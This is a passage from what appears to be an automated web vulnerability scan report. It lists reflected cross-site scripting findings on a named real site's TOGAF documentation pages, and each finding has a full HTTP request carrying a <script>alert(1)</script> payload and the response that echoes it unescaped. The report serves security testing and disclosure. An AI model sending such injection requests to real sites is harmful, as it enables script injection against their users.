Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 3206c--><script>alert(1)</script>b9fc947417 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch3206c--><script>alert(1)</script>b9fc947417/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/arch3206c--><script>alert(1)</script>b9fc947417/banner1.htm -->
...[SNIP]...

1.14. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aea1"><script>alert(1)</script>a0a70911350 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch7aea1"><script>alert(1)</script>a0a70911350/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:05 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch7aea1"><script>alert(1)</script>a0a70911350/banner1.htm">
...[SNIP]...

1.15. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3a31e<script>alert(1)</script>a9ecc41592c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch3a31e<script>alert(1)</script>a9ecc41592c/banner1.htm HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:07 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch3a31e<script>alert(1)</script>a9ecc41592c/banner1.htm<br>
...[SNIP]...

1.16. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload bd16a--><script>alert(1)</script>f6af9752da9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch/banner1.htmbd16a--><script>alert(1)</script>f6af9752da9 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:22 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5255

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/arch/banner1.htmbd16a--><script>alert(1)</script>f6af9752da9 -->
...[SNIP]...

1.17. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3d68<script>alert(1)</script>2e612c7e3a4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch/banner1.htmb3d68<script>alert(1)</script>2e612c7e3a4 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:19 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htmb3d68<script>alert(1)</script>2e612c7e3a4<br>
...[SNIP]...

1.18. http://www.opengroup.org/architecture/togaf8-doc/arch/banner1.htm [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/banner1.htm

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b06e9"><script>alert(1)</script>c339ed24d73 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch/banner1.htmb06e9"><script>alert(1)</script>c339ed24d73 HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:17 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5252

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch/banner1.htmb06e9"><script>alert(1)</script>c339ed24d73">
...[SNIP]...

1.19. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e36c"><script>alert(1)</script>e067f9695a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture3e36c"><script>alert(1)</script>e067f9695a3/togaf8-doc/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:23 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture3e36c"><script>alert(1)</script>e067f9695a3/togaf8-doc/arch/toc2.html">
...[SNIP]...

1.20. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11be1<script>alert(1)</script>3e620815dc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture11be1<script>alert(1)</script>3e620815dc4/togaf8-doc/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:24 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5240

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture11be1<script>alert(1)</script>3e620815dc4/togaf8-doc/arch/toc2.html<br>
...[SNIP]...

1.21. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b44de--><script>alert(1)</script>bcb67e2a8d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architectureb44de--><script>alert(1)</script>bcb67e2a8d5/togaf8-doc/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:29 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architectureb44de--><script>alert(1)</script>bcb67e2a8d5/togaf8-doc/arch/toc2.html -->
...[SNIP]...

1.22. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a7e1c<script>alert(1)</script>1741215fdf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doca7e1c<script>alert(1)</script>1741215fdf5/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:50 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5240

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doca7e1c<script>alert(1)</script>1741215fdf5/arch/toc2.html<br>
...[SNIP]...

1.23. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 9e1f5--><script>alert(1)</script>b71016c3570 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc9e1f5--><script>alert(1)</script>b71016c3570/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:55 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc9e1f5--><script>alert(1)</script>b71016c3570/arch/toc2.html -->
...[SNIP]...

1.24. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21311"><script>alert(1)</script>f9f7ddebf6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc21311"><script>alert(1)</script>f9f7ddebf6/arch/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:42 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5243

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc21311"><script>alert(1)</script>f9f7ddebf6/arch/toc2.html">
...[SNIP]...

1.25. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a39f<script>alert(1)</script>f8f8cdf717 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch9a39f<script>alert(1)</script>f8f8cdf717/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:07 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5237

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/architecture/togaf8-doc/arch9a39f<script>alert(1)</script>f8f8cdf717/toc2.html<br>
...[SNIP]...

1.26. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7288b"><script>alert(1)</script>23296fabe27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch7288b"><script>alert(1)</script>23296fabe27/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:05 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5246

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/architecture/togaf8-doc/arch7288b"><script>alert(1)</script>23296fabe27/toc2.html">
...[SNIP]...

1.27. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload c8177--><script>alert(1)</script>3a4b97807fc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/archc8177--><script>alert(1)</script>3a4b97807fc/toc2.html HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5249

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /architecture/togaf8-doc/archc8177--><script>alert(1)</script>3a4b97807fc/toc2.html -->
...[SNIP]...

1.28. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /architecture/togaf8-doc/arch/toc2.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c201c<script>alert(1)</script>1e4c0cf0ddd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /architecture/togaf8-doc/arch/toc2.htmlc201c<script>alert(1)</script>1e4c0cf0ddd HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/architecture/togaf8-doc/arch/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.5.10.1298915328
